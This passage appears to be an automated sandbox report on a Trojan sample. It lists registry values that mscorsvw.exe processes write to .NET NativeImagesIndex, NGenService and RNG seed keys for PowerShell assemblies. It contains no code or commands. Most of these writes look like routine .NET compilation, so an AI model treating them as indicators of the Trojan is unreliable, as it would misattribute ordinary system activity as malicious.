The process mscorsvw.exe:3832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 2E 99 F9 6E 23 22 F6 0C 1E C1 DC 28 5C D6 3E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "1E E0 20 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
The process mscorsvw.exe:3872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 78 59 96 55 F8 F6 E6 62 78 0A 2C 8B 95 4D 0E"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 BB 62 C1 60 3B 1E 54 2C 47 CF 4B 3A F7 FF E9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "54 91 20 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 96 46 4C 1A DA 27 42 2E 43 8E CA A9 72 4B 03"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
The process mscorsvw.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 4D 5B 62 51 0B D5 0C 9F 03 9B 98 20 66 19 2D"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "18 68 49 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
The process mscorsvw.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "B8 8D 6F 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 13 BB A4 3C DC E6 A0 68 6A F5 45 E8 8D 1A C9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
The process mscorsvw.exe:2000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
